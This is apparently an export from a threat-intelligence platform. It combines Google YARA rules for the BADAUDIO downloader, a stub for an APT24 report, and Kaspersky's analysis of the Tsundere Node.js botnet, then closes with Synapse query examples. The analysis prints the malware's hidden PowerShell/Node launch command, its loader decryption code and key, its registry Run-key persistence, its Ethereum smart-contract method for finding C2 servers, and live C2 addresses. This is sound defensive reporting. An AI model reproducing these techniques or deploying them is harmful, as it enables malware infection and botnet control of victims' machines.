Watermark_Hash: BeudtKgqnlm0Ruvf+VYxuw==
YARA Rules
rule G_Downloader_BADAUDIO_1 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
strings:
$string_decode = { 0F 28 [1-5] 0F 29 [1-5] 0F 28 [1-5] 0F 28 [1-5] 0F 28 [1-5] 0F 55 ?? 0F 55 ?? 0F 56 ?? 0F 28 ?? 0F 55 ?? 0F 55 ?? 0F 56 ?? 0F 57 ?? 0F 2? [1-5] 0F 2? [1-5] 0F 2? }
$s1 = "SystemFunction036" fullword
$s2_b64marker = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" fullword
$control_flow_obfuscation = { 66 2E 0F 1F 84 00 00 00 00 00 81 [5] 7? ?? 81 [5] 7? ?? 81 [5] 7? }
condition:
uint16(0) == 0x5a4d and all of them and #string_decode > 2 and #control_flow_obfuscation > 2
}
rule G_Downloader_BADAUDIO_2 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
strings:
$c_string_decode = { C5 F8 28 [1-24] C5 F8 57 [1-8] 0F 94 [4-128] C5 F8 29 [1-64] C5 F8 29 [1-24] C5 F8 57 [1-8] 0F 94 }
$s1 = "SystemFunction036" fullword
$s2_b64marker = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" fullword
$control_flow_obfuscation = { 66 2E 0F 1F 84 00 00 00 00 00 81 [5] 7? ?? 81 [5] 7? ?? 81 [5] 7? }
$c_part_of_control_flow_obfuscation_and_string_decode = { C5 F8 28 [1-5] 8B 46 ?? C5 F8 57 40 }
condition:
uint16(0) == 0x5a4d and all of ($s*) and #control_flow_obfuscation > 2 and ($c_string_decode or (#c_part_of_control_flow_obfuscation_and_string_decode > 5 and #c_part_of_control_flow_obfuscation_and_string_decode > 20))
}
rule G_APT_DOWNLOADER_BADAUDIO_3 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
strings:
$s1 = "SystemFunction036"
$s2 = "6666666666666666\\\\\\\\\\\\\\\\\\"
$dc1 = {C1 C2 1A ?? ?? C1 C3 15 31 D3 ?? ?? C1 C2 07}
$dc2 = {C1 C1 1E ?? ?? C1 C6 13 ?? ?? C1 C0 0A 31}
$dc3 = {C1 C5 19 C1 C7 0E 01 ?? ?? ?? 31 EF C1 EB 03 31}
$dc4 = {C1 C7 0F 8B ?? ?? ?? ?? ?? C1 C3 0D 31 FB C1 EA 0A 31}
$f2 = /\x0F\x4C\xC1\x3D[\x01-\xFF].{3}([\x70-\x7f].|\x0f[\x80-\x8f].{4})\x3D[\x01-\xFF].{3}([\x70-\x7f].|\x0f[\x80-\x8f].{4})\x3D[\x01-\xFF].{3}([\x70-\x7f].|\x0f[\x80-\x8f].{4})\x3D[\x01-\xFF].{3}([\x70-\x7f].|\x0f[\x80-\x8f].{4})\x3D[\x01-\xFF].{3}([\x70-\x7f].|\x0f[\x80-\x8f].{4})/
condition:
all of ($s*) and 3 of ($dc*) and uint16(0) == 0x5A4D and (#f1 > 5 or #f2 > 2) and filesize<10MB
}
rule G_APT_DOWNLOADER_BADAUDIO_4 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
strings:
$p00_0 = {8d4d??e8[4]8b7d??83c6??eb??c745[5]e8[4]8b4d??64890d}
$p00_1 = {568b7c24??8b7424??8b5424??89f1e8[4]f20f1007f20f104f??f20f118e}
condition:
uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
(
($p00_0 in (0..1100000) and $p00_1 in (0..990000))
)
}
Posted in
Threat Intelligence
:ext:id = T8Gn8hJy9MDXgPPEWPf3eKFiC22pQg9/jkwNHgMRBDU=_19aa2f62780:5c803d7:3cb6bc74
:summary = PRC-nexus APT24 uses BADAUDIO malware in a persistent, multi-vector espionage campaign targeting Taiwan.
:title = apt24's pivot to multi-vector attacks
:topics = ['crime', 'cyber crime', 'cyber security', 'domain indicators of compromise', 'hacking', 'hash indicators of compromise', 'indicators of compromise', 'malware', 'threat intelligence reports', 'url indicators of compromise', 'yara rules']
:url = https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks
:url:fqdn = cloud.google.com
media:news=78304cff5d449b48b1a1f955e3e10952
.created = 2025/11/28 18:24:04.018
:authors =
:body = Introduction
Tsundere is a new botnet, discovered by our Kaspersky GReAT around mid-2025. We have correlated this threat with
previous reports from October 2024
that reveal code similarities, as well as the use of the same C2 retrieval method and wallet. In that instance, the threat actor created malicious Node.js packages and used the Node Package Manager (npm) to deliver the payload. The packages were named similarly to popular packages, employing a technique known as typosquatting. The threat actor targeted libraries such as Puppeteer, Bignum.js, and various cryptocurrency packages, resulting in 287 identified malware packages. This supply chain attack affected Windows, Linux, and macOS users, but it was short-lived, as the packages were removed and the threat actor abandoned this infection method after being detected.
The threat actor resurfaced around July 2025 with a new threat. We have dubbed it the Tsundere bot after its C2 panel. This botnet is currently expanding and poses an active threat to Windows users.
Initial infection
Currently, there is no conclusive evidence on how the Tsundere bot implants are being spread. However, in one documented case, the implant was installed via a Remote Monitoring and Management (RMM) tool, which downloaded a file named
pdf.msi
from a compromised website. In other instances, the sample names suggest that the implants are being disseminated using the lure of popular Windows games, particularly first-person shooters. The samples found in the wild have names such as “valorant”, “cs2”, or “r6x”, which appear to be attempts to capitalize on the popularity of these games among piracy communities.
Malware implants
According to the C2 panel, there are two distinct formats for spreading the implant: via an MSI installer and via a PowerShell script. Implants are automatically generated by the C2 panel (as described in the
Infrastructure
section).
MSI installer
The MSI installer was often disguised as a fake installer for popular games and other software to lure new victims. Notably, at the time of our research, it had a very low detection rate.
The installer contains a list of data and JavaScript files that are updated with each new build, as well as the necessary Node.js executables to run these scripts. The following is a list of files included in the sample:
1
2
3
4
5
6
7
nodejs
/
B4jHWzJnlABB2B7
nodejs
/
UYE20NBBzyFhqAQ
.
js
nodejs
/
79juqlY2mETeQOc
nodejs
/
thoJahgqObmWWA2
nodejs
/
node
.
exe
nodejs
/
npm
.
cmd
nodejs
/
npx
.
cmd
The last three files in the list are legitimate Node.js files. They are installed alongside the malicious artifacts in the user’s
AppData\Local\nodejs
directory.
An examination of the CustomAction table reveals the process by which Windows Installer executes the malware and installs the Tsundere bot:
1
RunModulesSetup
1058
NodeDir
powershell
-
WindowStyle
Hidden
-
NoLogo
-
enc
JABuAG
[
.
.
.
]
ACkAOwAiAA
==
After Base64 decoding, the command appears as follows:
1
2
$
nodePath
=
"$env:LOCALAPPDATA\nodejs\node.exe"
;
&
$
nodePath
-
e
"const { spawn } = require('child_process'); spawn(process.env.LOCALAPPDATA + '\\nodejs\\node.exe', ['B4jHWzJnlABB2B7'], { detached: true, stdio: 'ignore', windowsHide: true, cwd: __dirname }).unref();"
This will execute Node.js code that spawns a new Node.js process, which runs the loader JavaScript code (in this case,
B4jHWzJnlABB2B7
). The resulting child process runs in the background, remaining hidden from the user.
Loader script
The loader script is responsible for ensuring the correct decryption and execution of the main bot script, which handles npm unpackaging and configuration. Although the loader code, similar to the code for the other JavaScript files, is obfuscated, it can be deobfuscated using open-source tools. Once executed, the loader attempts to locate the unpackaging script and configuration for the Tsundere bot, decrypts them using the AES-256 CBC cryptographic algorithm with a build-specific key and nonce, and saves the decrypted files under different filenames.
1
2
3
4
5
6
7
8
9
10
11
12
encScriptPath
=
'thoJahgqObmWWA2'
,
encConfigPath
=
'79juqlY2mETeQOc'
,
decScript
=
'uB39hFJ6YS8L2Fd'
,
decConfig
=
'9s9IxB5AbDj4Pmw'
,
keyBase64
=
'2l+jfiPEJufKA1bmMTesfxcBmQwFmmamIGM0b4YfkPQ='
,
ivBase64
=
'NxrqwWI+zQB+XL4+I/042A=='
,
[
.
.
.
]
const
h
=
path
.
dirname
(
encScriptPath
)
,
i
=
path
.
join
(
h
,
decScript
)
,
j
=
path
.
join
(
h
,
decConfig
)
decryptFile
(
encScriptPath
,
i
,
key
,
iv
)
decryptFile
(
encConfigPath
,
j
,
key
,
iv
)
The configuration file is a JSON that defines a directory and file structure, as well as file contents, which the malware will recreate. The malware author refers to this file as “config”, but its primary purpose is to package and deploy the Node.js package manager (npm) without requiring manual installation or downloading. The unpackaging script is responsible for recreating this structure, including the
node_modules
directory with all its libraries, which contains packages necessary for the malware to run.
With the environment now set up, the malware proceeds to install three packages to the
node_modules
directory using npm:
ws
: a WebSocket networking library
ethers
: a library for communicating with Ethereum
pm2
: a Node.js process management tool
Loader script installing the necessary toolset for Tsundere persistence and execution
The
pm2
package is installed to ensure the Tsundere bot remains active and used to launch the bot. Additionally,
pm2
helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.
PowerShell infector
The PowerShell version of the infector operates in a more compact and simplified manner. Instead of utilizing a configuration file and an unpacker — as done with the MSI installer — it downloads the ZIP file
node-v18.17.0-win-x64.zip
from the official Node.js website
nodejs[.]org
and extracts it to the
AppData\Local\NodeJS
directory, ultimately deploying Node.js on the targeted device. The infector then uses the AES-256-CBC algorithm to decrypt two large hexadecimal-encoded variables, which correspond to the bot script and a persistence script. These decrypted files, along with a
package.json
file are written to the disk. The
package.json
file contains information about the malicious Node.js package, as well as the necessary libraries to be installed, including the
ws
and
ethers
packages. Finally, the infector runs both scripts, starting with the persistence script that is followed by the bot script.
The PowerShell infector creates a package file with the implant dependencies
Persistence is achieved through the same mechanism observed in the MSI installer: the script creates a value in the HKCU:\Software\Microsoft\Windows\CurrentVersion\Run registry key that points to itself. It then overwrites itself with a new script that is Base64 decoded. This new script is responsible for ensuring the bot is executed on each login by spawning a new instance of the bot.
Tsundere bot
We will now delve into the Tsundere bot, examining its communication with the command-and-control (C2) server and its primary functionality.
C2 address retrieval
Web3 contracts, also known as smart contracts, are deployed on a blockchain via transactions from a wallet. These contracts can store data in variables, which can be modified by functions defined within the contract. In this case, the Tsundere botnet utilizes the Ethereum blockchain, where a method named
setString(string _str)
is defined to modify the state variable
param1
, allowing it to store a string. The string stored in
param1
is used by the Tsundere botnet administrators to store new WebSocket C2 servers, which can be rotated at will and are immutable once written to the Ethereum blockchain.
The Tsundere botnet relies on two constant points of reference on the Ethereum blockchain:
Wallet:
0x73625B6cdFECC81A4899D221C732E1f73e504a32
Contract:
0xa1b40044EBc2794f207D45143Bd82a1B86156c6b
In order to change the C2 server, the Tsundere botnet makes a transaction to update the state variable with a new address. Below is a transaction made on August 19, 2025, with a value of 0 ETH, which updates the address.
Smart contract containing the Tsundere botnet WebSocket C2
The state variable has a fixed length of 32 bytes, and a string of 24 bytes (see item [2] in the previous image) is stored within it. When this string is converted from hexadecimal to ASCII, it reveals the new WebSocket C2 server address:
ws[:]//185.28.119[.]179:1234
.
To obtain the C2 address, the bot contacts various public endpoints that provide remote procedure call (RPC) APIs, allowing them to interact with Ethereum blockchain nodes. At the start of the script, the bot calls a function named
fetchAndUpdateIP
, which iterates through a list of RPC providers. For each provider, it checks the transactions associated with the contract address and wallet owner, and then retrieves the string from the state variable containing the WebSocket address, as previously observed.
Malware code for retrieval of C2 from the smart contract
The Tsundere bot verifies that the C2 address starts with either
ws://
or
wss://
to ensure it is a valid WebSocket URL, and then sets the obtained string as the server URL. But before using this new URL, the bot first checks the system locale by retrieving the culture name of the machine to avoid infecting systems in the CIS region. If the system is not in the CIS region, the bot establishes a connection to the server via a WebSocket, setting up the necessary handlers for receiving, sending, and managing connection states, such as errors and closed sockets.
Bot handlers for communication
Communication
The communication flow between the client (Tsundere bot) and the server (WebSocket C2) is as follows:
The Tsundere bot establishes a WebSocket connection with the retrieved C2 address.
An AES key is transmitted immediately after the connection is established.
The bot sends an empty string to confirm receipt of the key.
The server then sends a nonce (IV), enabling the use of encrypted communication from that point on.
Encryption is required for all subsequent communication.
The bot transmits the OS information of the infected machine, including the MAC address, total memory, GPU information, and other details. This information is also used to generate a unique identifier (UUID).
The C2 server responds with a JSON object, acknowledging the connection and confirming the bot’s presence.
With the connection established, the client and server can exchange information freely.
To maintain the connection, keep-alive messages are sent every minute using ping/pong messages.
The bot sends encrypted responses as part of the ping/pong messages, ensuring continuous communication.
Tsundere communication process with the C2 via WebSockets
The connections are not authenticated through any additional means, making it possible for a fake client to establish a connection.
As previously mentioned, the client sends an encrypted ping message to the C2 server every minute, which returns a pong message. This ping-pong exchange serves as a mechanism for the C2 panel to maintain a list of currently active bots.
Functionality
The Tsundere bot is designed to allow the C2 server to send dynamic JavaScript code. When the C2 server sends a message with
ID=1
to the bot, the message is evaluated as a new function and then executed. The result of this operation is sent back to the server via a custom function named
serverSend
, which is responsible for transmitting the result as a JSON object, encrypted for secure communication.
Tsundere bot evaluation code once functions are received from the C2
The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions.
However, during our observation period, we did not receive any commands or functions from the C2 server, possibly because the newly connected bot needed to be requested by other threat actors through the botnet panel before it could be utilized.
Infrastructure
The Tsundere bot utilizes WebSocket as its primary protocol for establishing connections with the C2 server. As mentioned earlier, at the time of writing, the malware was communicating with the WebSocket server located at
185.28.119[.]179
, and our tests indicated that it was responding positively to bot connections.
The following table lists the IP addresses and ports extracted from the provided list of URLs:
IP
Port
First seen (contract update)
ASN
185.28.119[.]179
1234
2025-08-19
AS62005
196.251.72[.]192
1234
2025-08-03
AS401120
103.246.145[.]201
1234
2025-07-14
AS211381
193.24.123[.]68
3011
2025-06-21
AS200593
62.60.226[.]179
3001
2025-05-04
AS214351
Marketplace and control panel
No business is complete without a marketplace, and similarly, no botnet is complete without a control panel. The Tsundere botnet has both a marketplace and a control panel, which are integrated into the same frontend.
Tsundere botnet panel login
The notable aspect of Tsundere’s control panel, dubbed “Tsundere Netto” (version 2.4.4), is that it has an open registration system. Any user who accesses the login form can register and gain access to the panel, which features various tabs:
Bots: a dashboard displaying the number of bots under the user’s control
Settings: user settings and administrative functions
Build: if the user has an active license, they can create new bots using the two previously mentioned methodologies (MSI or PowerShell)
Market: this is the most interesting aspect of the panel, as it allows users to promote their individual bots and offer various services and functionalities to other threat actors. Each build can create a bot that performs a specific set of actions, which can then be offered to others
Monero wallet: a wallet service that enables users to make deposits or withdrawals
Socks proxy: a feature that allows users to utilize their bots as proxies for their traffic
Tsundere botnet control panel, building system and market
Each build generates a unique build ID, which is embedded in the implant and sent to the C2 server upon infection. This build ID can be linked to the user who created it. According to our research and analysis of other URLs found in the wild, builds are created through the panel and can be downloaded via the URL:
1
hxxps
:
//idk.1f2e[REDACTED]07a4[.]net/api/builds/{BUILD-ID}.msi.
At the time of writing this, the panel typically has between 90 and 115 bots connected to the C2 server at any given time.
Attribution
Based on the text found in the implants, we can conclude with high confidence that the threat actor behind the Tsundere botnet is likely Russian-speaking. The use of the Russian language in the implants is consistent with
previous attacks
attributed to the same threat actor.
Russian being used throughout the code
Furthermore, our analysis suggests a connection between the Tsundere botnet and the 123 Stealer, a C++-based stealer available on the shadow market for $120 per month. This connection is based on the fact that both panels share the same server. Notably, the main domain serves as the frontend for the 123 Stealer panel, while the subdomain “idk.” is used for the Tsundere botnet panel.
123 Stealer C2 panel sharing Tsundere’s infrastructure and showcasing its author
By examining the available evidence, we can link both threats to a Russian-speaking threat actor known as “koneko”. Koneko was previously active on a dark web forum, where they promoted the 123 Stealer, as well as other malware, including a backdoor. Although our analysis of the backdoor revealed that it was not directly related to Tsundere, it shared similarities with the Tsundere botnet in that it was written in Node.js and used PowerShell or MSI as infectors. Before the dark web forum was seized and shut down, koneko’s profile featured the title “node malware senior”, further suggesting their expertise in Node.js-based malware.
Conclusion
The Tsundere botnet represents a renewed effort by a presumably identified threat actor to revamp their toolset. The Node.js-based bot is an evolution of an attack discovered in October of last year, and it now features a new strategy and even a new business model. Infections can occur through MSI and PowerShell files, which provides flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat.
Additionally, the botnet leverages a technique that is gaining popularity: utilizing web3 contracts, also known as “smart contracts”, to host command-and-control (C2) addresses, which enhances the resilience of the botnet infrastructure. The botnet’s possible author, koneko, is also involved in peddling other threats, such as the 123 Stealer, which suggests that the threat is likely to escalate rather than diminish in the coming months. As a result, it is essential to closely monitor this threat and be vigilant for related threats that may emerge in the near future.
Indicators of compromise
More IoCs related to this threat are available to customers of
the Kaspersky Intelligence Reporting Service
. Contact:
intelreports@kaspersky.com
.
File hashes
235A93C7A4B79135E4D3C220F9313421
760B026EDFE2546798CDC136D0A33834
7E70530BE2BFFCFADEC74DE6DC282357
5CC5381A1B4AC275D221ECC57B85F7C3
AD885646DAEE05159902F32499713008
A7ED440BB7114FAD21ABFA2D4E3790A0
7CF2FD60B6368FBAC5517787AB798EA2
E64527A9FF2CAF0C2D90E2238262B59A
31231FD3F3A88A27B37EC9A23E92EBBC
FFBDE4340FC156089F968A3BD5AA7A57
E7AF0705BA1EE2B6FBF5E619C3B2747E
BFD7642671A5788722D74D62D8647DF9
8D504BA5A434F392CC05EBE0ED42B586
87CE512032A5D1422399566ECE5E24CF
B06845C9586DCC27EDBE387EAAE8853F
DB06453806DACAFDC7135F3B0DEA4A8F
File paths
%APPDATA%\Local\NodeJS
Domains and IPs
ws://185.28.119[.]179:1234
ws://196.251.72[.]192:1234
ws://103.246.145[.]201:1234
ws://193.24.123[.]68:3011
ws://62.60.226[.]179:3001
Cryptocurrency wallets
Note: These are wallets that have changed the C2 address in the smart contract since it was created.
0x73625B6cdFECC81A4899D221C732E1f73e504a32
0x10ca9bE67D03917e9938a7c28601663B191E4413
0xEc99D2C797Db6E0eBD664128EfED9265fBE54579
0xf11Cb0578EA61e2EDB8a4a12c02E3eF26E80fc36
0xdb8e8B0ef3ea1105A6D84b27Fc0bAA9845C66FD7
0x10ca9bE67D03917e9938a7c28601663B191E4413
0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84
0x46b0f9bA6F1fb89eb80347c92c9e91BDF1b9E8CC
:ext:id = T8Gn8hJy9MDXgPPEWPf3eKFiC22pQg9/jkwNHgMRBDU=_19aa2bebe43:5c0ccab:3cb6bc74
:summary = Kaspersky GReAT experts discovered a new campaign featuring the Tsundere botnet. Node.js-based bots abuse web3 smart contracts and are spread via MSI installers and PowerShell scripts.
:title = the tsundere botnet uses the ethereum blockchain to infect its targets
:topics = ['crypto', 'cyber crime', 'cyber security', 'email address indicators of compromise', 'hacking', 'hash indicators of compromise', 'indicators of compromise', 'ip indicators of compromise', 'malware', 'threat intelligence reports', 'url indicators of compromise', 'use cases']
:url = https://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/
:url:fqdn = securelist.com
Use of meta:source nodes
Synapse-Feedly uses a meta:source node and -(seen)> light
weight edges to track nodes observed from the Feedly API.
> meta:source=65f646d730ffa68037a6f23c28c5340d
meta:source=65f646d730ffa68037a6f23c28c5340d
.created = 2025/11/28 18:24:03.318
:name = feedly api
:type = synapse.feedly
Storm can be used to filter nodes to include/exclude nodes which have been observed by Synapse-Feedly. The following example shows how to filter the results of a query to include only results observed by Synapse-Feedly:
> #cool.tag.lift +{ <(seen)- meta:source=65f646d730ffa68037a6f23c28c5340d }